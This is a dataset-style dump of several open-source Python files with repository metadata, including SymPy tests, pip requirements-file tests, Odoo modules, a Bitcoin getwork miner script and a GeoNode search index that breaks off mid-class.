repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
Gadal/sympy | sympy/combinatorics/tests/test_util.py | 98 | 4542 | from sympy.core.compatibility import range
from sympy.combinatorics.named_groups import SymmetricGroup, DihedralGroup,\
AlternatingGroup
from sympy.combinatorics.permutations import Permutation
from sympy.combinatorics.util import _check_cycles_alt_sym, _strip,\
_distribute_gens_by_base, _strong_gens_from_distr,\
_orbits_transversals_from_bsgs, _handle_precomputed_bsgs, _base_ordering,\
_remove_gens
from sympy.combinatorics.testutil import _verify_bsgs
def test_check_cycles_alt_sym():
perm1 = Permutation([[0, 1, 2, 3, 4, 5, 6], [7], [8], [9]])
perm2 = Permutation([[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]])
perm3 = Permutation([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
assert _check_cycles_alt_sym(perm1) is True
assert _check_cycles_alt_sym(perm2) is False
assert _check_cycles_alt_sym(perm3) is False
def test_strip():
D = DihedralGroup(5)
D.schreier_sims()
member = Permutation([4, 0, 1, 2, 3])
not_member1 = Permutation([0, 1, 4, 3, 2])
not_member2 = Permutation([3, 1, 4, 2, 0])
identity = Permutation([0, 1, 2, 3, 4])
res1 = _strip(member, D.base, D.basic_orbits, D.basic_transversals)
res2 = _strip(not_member1, D.base, D.basic_orbits, D.basic_transversals)
res3 = _strip(not_member2, D.base, D.basic_orbits, D.basic_transversals)
assert res1[0] == identity
assert res1[1] == len(D.base) + 1
assert res2[0] == not_member1
assert res2[1] == len(D.base) + 1
assert res3[0] != identity
assert res3[1] == 2
def test_distribute_gens_by_base():
base = [0, 1, 2]
gens = [Permutation([0, 1, 2, 3]), Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1]), Permutation([3, 2, 1, 0])]
assert _distribute_gens_by_base(base, gens) == [gens,
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1])],
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2])]]
def test_strong_gens_from_distr():
strong_gens_distr = [[Permutation([0, 2, 1]), Permutation([1, 2, 0]),
Permutation([1, 0, 2])], [Permutation([0, 2, 1])]]
assert _strong_gens_from_distr(strong_gens_distr) == \
[Permutation([0, 2, 1]),
Permutation([1, 2, 0]),
Permutation([1, 0, 2])]
def test_orbits_transversals_from_bsgs():
S = SymmetricGroup(4)
S.schreier_sims()
base = S.base
strong_gens = S.strong_gens
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
result = _orbits_transversals_from_bsgs(base, strong_gens_distr)
orbits = result[0]
transversals = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert S.order() == order
def test_handle_precomputed_bsgs():
A = AlternatingGroup(5)
A.schreier_sims()
base = A.base
strong_gens = A.strong_gens
result = _handle_precomputed_bsgs(base, strong_gens)
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
assert strong_gens_distr == result[2]
transversals = result[0]
orbits = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert A.order() == order
def test_base_ordering():
base = [2, 4, 5]
degree = 7
assert _base_ordering(base, degree) == [3, 4, 0, 5, 1, 2, 6]
def test_remove_gens():
S = SymmetricGroup(10)
base, strong_gens = S.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(S, base, new_gens) is True
A = AlternatingGroup(7)
base, strong_gens = A.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(A, base, new_gens) is True
D = DihedralGroup(2)
base, strong_gens = D.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(D, base, new_gens) is True
| bsd-3-clause |
njall/Orctrix | flaskapp/orcid.py | 1 | 3759 | """
API wrapper to Orcid.
"""
import hashlib
import logging
import re
import json
import requests
logging.basicConfig(level=logging.DEBUG)
BASE_URL = "https://pub.orcid.org/"
def _get_raw_json(orcid_id, action=""):
"""Get raw JSON file for orcid_id."""
url = orcid_url(orcid_id, action)
logging.info(url)
resp = requests.get(url,
headers={'Accept':'application/orcid+json'})
return resp.json()
def orcid_url(orcid_id, action=""):
return BASE_URL + orcid_id + action
def get_profile(orcid_id):
"""Get JSON for Orcid and clean it."""
raw_json = _get_raw_json(orcid_id)
# TODO Add information
profile = {}
for name in ('credit_name', 'given_names', 'family_name'):
try:
profile[name] = raw_json.get("orcid-profile").get("orcid-bio").get("personal-details").get(name.replace('_', '-')).get("value")
except:
profile[name] = None
if profile['credit_name']:
profile['name'] = profile['credit_name']
else:
profile['name'] = profile['given_names'] + ' ' + profile['family_name']
try:
profile['email'] = raw_json.get("orcid-profile").get("orcid-bio").get("contact-details").get("email")[0].get("value").lower().strip()
except:
profile['email'] = None
profile['affiliation'] = get_current_affiliation(orcid_id)
try:
profile['bio'] = raw_json.get('orcid-profile').get('orcid-bio').get('biography').get('value')
except:
profile['bio'] = None
if profile['email']:
profile['gravatarhash'] = hashlib.md5(profile['email'].encode('utf-8')).hexdigest()
else:
profile['gravatarhash'] = None
return profile
def get_works(orcid_id):
""" Return dictionary containing work of person with ORCID id. Dict indexed by DOI of works """
raw_json = _get_raw_json(orcid_id, "/orcid-works")
try:
works = raw_json['orcid-profile']['orcid-activities']['orcid-works']['orcid-work']
except:
works = None
d = []
# TODO Improve the box_type selection
box_type = "full"
if works:
for item in works:
if box_type == "full":
box_type = "images"
elif box_type == "images":
box_type = "donut"
else:
box_type = "full"
doi, tmp_d = work_item(item)
if tmp_d:
tmp_d["doi"] = doi
tmp_d["image"] = None
# XXX Need to parse some information
if tmp_d.get("cite") and tmp_d.get("cite").get("work-citation-type") == "BIBTEX":
m = re.search('title\s?=\s?{(.+)}', tmp_d.get("cite").get("citation"))
tmp_d["title"] = m.group(1)
else:
pass
tmp_d["box_type"] = box_type
d.append(tmp_d)
return d
def get_current_affiliation(orcid_id):
#raw_json = _get_raw_json(orcid_id, "orcid-employment")
string = "I am from the university of life mate"
return string
def work_item(item):
dobj={}
if item['work-external-identifiers'] and item['work-citation']:
doi = item['work-external-identifiers']['work-external-identifier'][0]['work-external-identifier-id']['value']
dobj['cite'] = item['work-citation']
if item['url']:
dobj['url'] = item['url'].get("value")
else:
dobj['url'] = "Not available"
dobj['title'] = item['work-title']['title']['value']
dobj['subtitle'] = item.get('work-title').get("subtitle")
dobj['description'] = item.get('short-description')
#dobj['type'] = item['type']
return doi, dobj,
else:
return None, None
| mit |
xiaoyanit/kivy | examples/animation/animate.py | 40 | 1338 | '''
Widget animation
================
This example demonstrates creating and applying a multi-part animation to
a button widget. You should see a button labelled 'plop' that will move with
an animation when clicked.
'''
import kivy
kivy.require('1.0.7')
from kivy.animation import Animation
from kivy.app import App
from kivy.uix.button import Button
class TestApp(App):
def animate(self, instance):
# create an animation object. This object could be stored
# and reused each call or reused across different widgets.
# += is a sequential step, while &= is in parallel
animation = Animation(pos=(100, 100), t='out_bounce')
animation += Animation(pos=(200, 100), t='out_bounce')
animation &= Animation(size=(500, 500))
animation += Animation(size=(100, 50))
# apply the animation on the button, passed in the "instance" argument
# Notice that default 'click' animation (changing the button
# color while the mouse is down) is unchanged.
animation.start(instance)
def build(self):
# create a button, and attach animate() method as a on_press handler
button = Button(size_hint=(None, None), text='plop',
on_press=self.animate)
return button
if __name__ == '__main__':
TestApp().run()
| mit |
haridsv/pip | tests/functional/test_install_reqs.py | 21 | 8848 | import os.path
import textwrap
import pytest
from tests.lib import (pyversion, path_to_url,
_create_test_package_with_subdirectory)
from tests.lib.local_repos import local_checkout
@pytest.mark.network
def test_requirements_file(script):
"""
Test installing from a requirements file.
"""
other_lib_name, other_lib_version = 'anyjson', '0.3'
script.scratch_path.join("initools-req.txt").write(textwrap.dedent("""\
INITools==0.2
# and something else to test out:
%s<=%s
""" % (other_lib_name, other_lib_version)))
result = script.pip(
'install', '-r', script.scratch_path / 'initools-req.txt'
)
assert (
script.site_packages / 'INITools-0.2-py%s.egg-info' %
pyversion in result.files_created
)
assert script.site_packages / 'initools' in result.files_created
assert result.files_created[script.site_packages / other_lib_name].dir
fn = '%s-%s-py%s.egg-info' % (other_lib_name, other_lib_version, pyversion)
assert result.files_created[script.site_packages / fn].dir
def test_schema_check_in_requirements_file(script):
"""
Test installing from a requirements file with an invalid vcs schema..
"""
script.scratch_path.join("file-egg-req.txt").write(
"\n%s\n" % (
"git://github.com/alex/django-fixture-generator.git"
"#egg=fixture_generator"
)
)
with pytest.raises(AssertionError):
script.pip(
"install", "-vvv", "-r", script.scratch_path / "file-egg-req.txt"
)
def test_relative_requirements_file(script, data):
"""
Test installing from a requirements file with a relative path with an
egg= definition..
"""
url = path_to_url(
os.path.join(data.root, "packages", "..", "packages", "FSPkg")
) + '#egg=FSPkg'
script.scratch_path.join("file-egg-req.txt").write(textwrap.dedent("""\
%s
""" % url))
result = script.pip(
'install', '-vvv', '-r', script.scratch_path / 'file-egg-req.txt'
)
assert (
script.site_packages / 'FSPkg-0.1.dev0-py%s.egg-info' % pyversion
) in result.files_created, str(result)
assert (script.site_packages / 'fspkg') in result.files_created, (
str(result.stdout)
)
@pytest.mark.network
def test_multiple_requirements_files(script, tmpdir):
"""
Test installing from multiple nested requirements files.
"""
other_lib_name, other_lib_version = 'anyjson', '0.3'
script.scratch_path.join("initools-req.txt").write(
textwrap.dedent("""
-e %s@10#egg=INITools-dev
-r %s-req.txt
""") %
(
local_checkout(
'svn+http://svn.colorstudy.com/INITools/trunk',
tmpdir.join("cache"),
),
other_lib_name
),
)
script.scratch_path.join("%s-req.txt" % other_lib_name).write(
"%s<=%s" % (other_lib_name, other_lib_version)
)
result = script.pip(
'install', '-r', script.scratch_path / 'initools-req.txt'
)
assert result.files_created[script.site_packages / other_lib_name].dir
fn = '%s-%s-py%s.egg-info' % (other_lib_name, other_lib_version, pyversion)
assert result.files_created[script.site_packages / fn].dir
assert script.venv / 'src' / 'initools' in result.files_created
def test_package_in_constraints_and_dependencies(script, data):
script.scratch_path.join("constraints.txt").write(
"TopoRequires2==0.0.1\nTopoRequires==0.0.1"
)
result = script.pip('install', '--no-index', '-f',
data.find_links, '-c', script.scratch_path /
'constraints.txt', 'TopoRequires2')
assert 'installed TopoRequires-0.0.1' in result.stdout
def test_multiple_constraints_files(script, data):
script.scratch_path.join("outer.txt").write("-c inner.txt")
script.scratch_path.join("inner.txt").write(
"Upper==1.0")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'outer.txt', 'Upper')
assert 'installed Upper-1.0' in result.stdout
def test_respect_order_in_requirements_file(script, data):
script.scratch_path.join("frameworks-req.txt").write(textwrap.dedent("""\
parent
child
simple
"""))
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-r',
script.scratch_path / 'frameworks-req.txt'
)
downloaded = [line for line in result.stdout.split('\n')
if 'Collecting' in line]
assert 'parent' in downloaded[0], (
'First download should be "parent" but was "%s"' % downloaded[0]
)
assert 'child' in downloaded[1], (
'Second download should be "child" but was "%s"' % downloaded[1]
)
assert 'simple' in downloaded[2], (
'Third download should be "simple" but was "%s"' % downloaded[2]
)
def test_install_local_editable_with_extras(script, data):
to_install = data.packages.join("LocalExtras")
res = script.pip(
'install', '-e', to_install + '[bar]', '--process-dependency-links',
expect_error=False,
expect_stderr=True,
)
assert script.site_packages / 'easy-install.pth' in res.files_updated, (
str(res)
)
assert (
script.site_packages / 'LocalExtras.egg-link' in res.files_created
), str(res)
assert script.site_packages / 'simple' in res.files_created, str(res)
@pytest.mark.network
def test_install_collected_dependancies_first(script):
result = script.pip(
'install', 'paramiko',
)
text = [line for line in result.stdout.split('\n')
if 'Installing' in line][0]
assert text.endswith('paramiko')
@pytest.mark.network
def test_install_local_editable_with_subdirectory(script):
version_pkg_path = _create_test_package_with_subdirectory(script,
'version_subdir')
result = script.pip(
'install', '-e',
'%s#egg=version_subpkg&subdirectory=version_subdir' %
('git+file://%s' % version_pkg_path,)
)
result.assert_installed('version-subpkg', sub_dir='version_subdir')
def test_user_with_prefix_in_pydistutils_cfg(script, data, virtualenv):
virtualenv.system_site_packages = True
homedir = script.environ["HOME"]
script.scratch_path.join("bin").mkdir()
with open(os.path.join(homedir, ".pydistutils.cfg"), "w") as cfg:
cfg.write(textwrap.dedent("""
[install]
prefix=%s""" % script.scratch_path))
result = script.pip('install', '--user', '--no-index', '-f',
data.find_links, 'requiresupper')
assert 'installed requiresupper' in result.stdout
def test_nowheel_user_with_prefix_in_pydistutils_cfg(script, data, virtualenv):
virtualenv.system_site_packages = True
homedir = script.environ["HOME"]
script.scratch_path.join("bin").mkdir()
with open(os.path.join(homedir, ".pydistutils.cfg"), "w") as cfg:
cfg.write(textwrap.dedent("""
[install]
prefix=%s""" % script.scratch_path))
result = script.pip('install', '--no-use-wheel', '--user', '--no-index',
'-f', data.find_links, 'requiresupper')
assert 'installed requiresupper' in result.stdout
def test_install_option_in_requirements_file(script, data, virtualenv):
"""
Test --install-option in requirements file overrides same option in cli
"""
script.scratch_path.join("home1").mkdir()
script.scratch_path.join("home2").mkdir()
script.scratch_path.join("reqs.txt").write(
textwrap.dedent(
"""simple --install-option='--home=%s'"""
% script.scratch_path.join("home1")))
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-r',
script.scratch_path / 'reqs.txt',
'--install-option=--home=%s' % script.scratch_path.join("home2"),
expect_stderr=True)
package_dir = script.scratch / 'home1' / 'lib' / 'python' / 'simple'
assert package_dir in result.files_created
def test_constraints_not_installed_by_default(script, data):
script.scratch_path.join("c.txt").write("requiresupper")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'c.txt', 'Upper')
assert 'requiresupper' not in result.stdout
def test_constraints_only_causes_error(script, data):
script.scratch_path.join("c.txt").write("requiresupper")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'c.txt', expect_error=True)
assert 'installed requiresupper' not in result.stdout
| mit |
nghia-huynh/gem5-stable | tests/configs/simple-atomic-mp.py | 69 | 2376 | # Copyright (c) 2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
from m5.objects import *
from base_config import *
nb_cores = 4
root = BaseSESystem(mem_mode='atomic', cpu_class=AtomicSimpleCPU,
num_cpus=nb_cores).create_root()
| bsd-3-clause |
dgzurita/odoo | addons/purchase/partner.py | 210 | 2566 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class res_partner(osv.osv):
_name = 'res.partner'
_inherit = 'res.partner'
def _purchase_invoice_count(self, cr, uid, ids, field_name, arg, context=None):
PurchaseOrder = self.pool['purchase.order']
Invoice = self.pool['account.invoice']
return {
partner_id: {
'purchase_order_count': PurchaseOrder.search_count(cr,uid, [('partner_id', 'child_of', partner_id)], context=context),
'supplier_invoice_count': Invoice.search_count(cr,uid, [('partner_id', 'child_of', partner_id), ('type','=','in_invoice')], context=context)
}
for partner_id in ids
}
def _commercial_fields(self, cr, uid, context=None):
return super(res_partner, self)._commercial_fields(cr, uid, context=context) + ['property_product_pricelist_purchase']
_columns = {
'property_product_pricelist_purchase': fields.property(
type='many2one',
relation='product.pricelist',
domain=[('type','=','purchase')],
string="Purchase Pricelist",
help="This pricelist will be used, instead of the default one, for purchases from the current partner"),
'purchase_order_count': fields.function(_purchase_invoice_count, string='# of Purchase Order', type='integer', multi="count"),
'supplier_invoice_count': fields.function(_purchase_invoice_count, string='# Supplier Invoices', type='integer', multi="count"),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ramitalat/odoo | addons/hr_attendance/report/attendance_errors.py | 377 | 3669 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import time
from openerp.osv import osv
from openerp.report import report_sxw
class attendance_print(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(attendance_print, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'lst': self._lst,
'total': self._lst_total,
'get_employees':self._get_employees,
})
def _get_employees(self, emp_ids):
emp_obj_list = self.pool.get('hr.employee').browse(self.cr, self.uid, emp_ids)
return emp_obj_list
def _lst(self, employee_id, dt_from, dt_to, max, *args):
self.cr.execute("select name as date, create_date, action, create_date-name as delay from hr_attendance where employee_id=%s and to_char(name,'YYYY-mm-dd')<=%s and to_char(name,'YYYY-mm-dd')>=%s and action IN (%s,%s) order by name", (employee_id, dt_to, dt_from, 'sign_in', 'sign_out'))
res = self.cr.dictfetchall()
for r in res:
if r['action'] == 'sign_out':
r['delay'] = -r['delay']
temp = r['delay'].seconds
r['delay'] = str(r['delay']).split('.')[0]
if abs(temp) < max*60:
r['delay2'] = r['delay']
else:
r['delay2'] = '/'
return res
def _lst_total(self, employee_id, dt_from, dt_to, max, *args):
self.cr.execute("select name as date, create_date, action, create_date-name as delay from hr_attendance where employee_id=%s and to_char(name,'YYYY-mm-dd')<=%s and to_char(name,'YYYY-mm-dd')>=%s and action IN (%s,%s) order by name", (employee_id, dt_to, dt_from, 'sign_in', 'sign_out'))
res = self.cr.dictfetchall()
if not res:
return ('/','/')
total2 = datetime.timedelta(seconds = 0, minutes = 0, hours = 0)
total = datetime.timedelta(seconds = 0, minutes = 0, hours = 0)
for r in res:
if r['action'] == 'sign_out':
r['delay'] = -r['delay']
total += r['delay']
if abs(r['delay'].seconds) < max*60:
total2 += r['delay']
result_dict = {
'total': total and str(total).split('.')[0],
'total2': total2 and str(total2).split('.')[0]
}
return [result_dict]
class report_hr_attendanceerrors(osv.AbstractModel):
_name = 'report.hr_attendance.report_attendanceerrors'
_inherit = 'report.abstract_report'
_template = 'hr_attendance.report_attendanceerrors'
_wrapped_report_class = attendance_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
kalilinuxoo7/bitsendupgrade | contrib/pyminer/pyminer.py | 2 | 6434 | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8800
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| mit |
GFDRR/geonode | geonode/documents/search_indexes.py | 20 | 4991 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from agon_ratings.models import OverallRating
from dialogos.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.db.models import Avg
from haystack import indexes
from geonode.documents.models import Document
class DocumentIndex(indexes.SearchIndex, indexes.Indexable):
id = indexes.IntegerField(model_attr='id')
abstract = indexes.CharField(model_attr="abstract", boost=1.5)
category__gn_description = indexes.CharField(model_attr="category__gn_description", null=True)
csw_type = indexes.CharField(model_attr="csw_type")
csw_wkt_geometry = indexes.CharField(model_attr="csw_wkt_geometry")
detail_url = indexes.CharField(model_attr="get_absolute_url")
owner__username = indexes.CharField(model_attr="owner", faceted=True, null=True)
popular_count = indexes.IntegerField(
model_attr="popular_count",
default=0,
boost=20)
share_count = indexes.IntegerField(model_attr="share_count", default=0)
rating = indexes.IntegerField(null=True)
srid = indexes.CharField(model_attr="srid")
supplemental_information = indexes.CharField(model_attr="supplemental_information", null=True)
thumbnail_url = indexes.CharField(model_attr="thumbnail_url", null=True)
uuid = indexes.CharField(model_attr="uuid")
title = indexes.CharField(model_attr="title", boost=2)
date = indexes.DateTimeField(model_attr="date")
text = indexes.EdgeNgramField(document=True, use_template=True, stored=False)
type = indexes.CharField(faceted=True)
title_sortable = indexes.CharField(indexed=False, stored=False) # Necessary for sorting
category = indexes.CharField(
model_attr="category__identifier",
faceted=True,
null=True,
stored=True)
bbox_left = indexes.FloatField(model_attr="bbox_x0", null=True, stored=False)
bbox_right = indexes.FloatField(model_attr="bbox_x1", null=True, stored=False)
bbox_bottom = indexes.FloatField(model_attr="bbox_y0", null=True, stored=False)
bbox_top = indexes.FloatField(model_attr="bbox_y1", null=True, stored=False)
temporal_extent_start = indexes.DateTimeField(
model_attr="temporal_extent_start",
null=True,
stored=False)
temporal_extent_end = indexes.DateTimeField(
model_attr="temporal_extent_end",
null=True,
stored=False)
keywords = indexes.MultiValueField(
model_attr="keyword_slug_list",
null=True,
faceted=True,
stored=True)
regions = indexes.MultiValueField(
model_attr="region_name_list",
null=True,
faceted=True,
stored=True)
popular_count = indexes.IntegerField(
model_attr="popular_count",
default=0,
boost=20)
share_count = indexes.IntegerField(model_attr="share_count", default=0)
rating = indexes.IntegerField(null=True)
num_ratings = indexes.IntegerField(stored=False)
num_comments = indexes.IntegerField(stored=False)
